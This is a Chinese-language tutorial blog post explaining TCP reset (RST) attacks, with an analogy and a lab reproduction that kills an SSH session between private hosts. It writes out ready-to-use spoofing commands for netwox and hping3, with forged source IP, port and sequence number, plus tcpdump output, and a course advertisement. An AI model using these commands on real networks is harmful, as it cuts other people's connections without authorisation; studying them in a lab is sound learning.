复位攻击的原理

什么是复位攻击

在了解复位攻击之前,先说一说TCP首部数据中的有几个特殊的标识bit,分别是ACK,RST,SYN,FIN等等.

当指定bit设置为1的时候,该TCP指定就有指定特殊的含义.

比如三次握手中第一次握手SYN=1,四次挥手中第一次挥手FIN=1.在复位攻击的时候就用到了RST标志位.

RST复位攻击就是利用TCP的RST标志位实现的

通俗来说

小明和小红在谈恋爱, 但是两个人距离比较作为离得比较远,都是通过在小纸条上写名字,让同学帮忙传递.

后来小刚吃醋了,就偷偷的给小红写了分手信,署的小明的名字.

小红以为真的要分手,就熄灭了心中的激情.

后来真的小明的信又来了, 小红直接回复"分手,滚"

小明收到信之后心灰意冷

最终小明和小刚过上了幸福的生活. (he～tui)

普通的讲

客户端A和服务端B建立连接之后会互相持有对方的序列号.在序列号,端口号,源IP都符合规则的情况下,服务端就会认为数据是真实有效的,就执行对应的操作.

在这时候客户端C在获取了A,B的重要信息之后,伪造了A的RST操作,并发送给B,

B收到指令之后复位关闭了连接.

真正的A再正常请求A数据的时候,B就认为A请求是一个异常请求,然后给A发送了RST指令,然后A也退出了连接.

实战复现

此处有台式机20.1.0.1

两个虚拟机 分别是 20.1.0.128和 20.1.0.132

此后用(1) (128) 和 (132) 表示

在这里模拟了两种攻击手段,第一种netwox攻击,第二种hping3攻击.

在netwox下 (128)服务器, (1)是客户机也是攻击机,(132)是检测机

在hping3下 (128)服务器, (1)是客户机, (132)是攻击机

主体内容在netwox下,请顺序观看

netwox和wireshark在(1)上, hping3在(132)上

netwox攻击

1. (1)上Wireshark监听指定网卡上的22端口的请求;(132)通过ssh连接到(128)上 ,执行tcpdump监听22端口.
2. (1)通过ssh连接到(128)服务器,Wireshark可以看到以下部分记录

?红线标识的是最后一条(1)->(128)的TCP指令, 在这里就从选择的这一条获取我们需要的数据

?在这里我们知道了(1)的端口号是58744, 顺序号是782014969,() 并且我们也知道 两个服务器IP.

到了这里我们就可以发起攻击了

netwox 40 -l 20.1.0.1 -m 20.1.0.128 -o 58744 -p 22 -B -q 782014969 

-l 伪装的源IP -m 目标IP -o 伪装的源端口号 -p 目标IP的端口号 -B -q 原IP 顺序号

?发送完指令之后,我们去Wireshark 就会发现两条伪装的RST指令. 假(1)->(128) RST

?到此(128)重置了连接.

在一定时间之后(一分钟之内),真正(1)上的ssh向(128)发送了请求,这时候(128)已经不认得他了, 然后给他回复了RST信息

?至此(1)也断开了.

?是的我这里SSH显示的是Connection closed by foreign host.不是Broken pipe ,是不是很惊讶.

到这里(132)监测服务器上面又有什么呢

15:15:43.944077 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807771, win 2048, length 0
15:15:47.751231 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014917:782014969, ack 3474807771, win 2048, length 52
15:15:47.751716 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [P.], seq 3474807771:3474807855, ack 782014969, win 270, length 84
15:15:47.792409 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [.], ack 3474807855, win 2048, length 0
15:16:10.784854 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [R], seq 782014969, win 0, length 0
15:16:11.623166 IP 20.1.0.1.58744 > 20.1.0.128.ssh: Flags [P.], seq 782014969:782015005, ack 3474807855, win 2048, length 36
15:16:11.623311 IP 20.1.0.128.ssh > 20.1.0.1.58744: Flags [R], seq 3474807855, win 0, length 0

因此也能根据tcpdump监测来自己测试TCP复位攻击

相关视频推荐

支撑互联网的基石tcpip，5个方面全面解析

手写一个用户态协议栈以及零拷贝的实现

学习地址：C/C++Linux服务器开发/后台架构师【零声教育】-学习视频教程-腾讯课堂

需要C/C++ Linux服务器架构师学习资料加群812855908获取（资料包括C/C++，Linux，golang技术，Nginx，ZeroMQ，MySQL，Redis，fastdfs，MongoDB，ZK，流媒体，CDN，P2P，K8S，Docker，TCP/IP，协程，DPDK，ffmpeg等），免费分享

hping3攻击

1. (1)上Wireshark监听指定网卡上的22端口的请求; (132)作为攻击机, (128)作为服务器
2. (1)通过ssh连接到(128)服务器,Wireshark可以看到以下部分记录

1. 然后在(132)上执行

 sudo hping3 -a 20.1.0.1 -s 57292  -R  20.1.0.128  -p 22  -M 2042569399  -c 1 

sudo hping3 -a 伪装的源IP -s 伪装的源端口号 -R 目标IP -p 目标端口号 -M 源IP顺序号 -c 1

?到这里去看Wireshark,已经存在了两次RST记录

?再看(1)的ssh也断开了

Connection closed by foreign host. 

最后

关于TCP复位攻击的实例,网上的文章有一半都没有做测试,只有一个开头和一个所谓的结果.剩下的有优秀的,都散落在各种角落不被搜索引擎搜索到.netwox攻击实例是一个外国大学网上找的课件中的例子看明白的,hping3是在一个错误的例子上,综合man注释,和已经成功的netwox攻击上推测出来的.

纸上得来终觉浅，绝知此事要躬行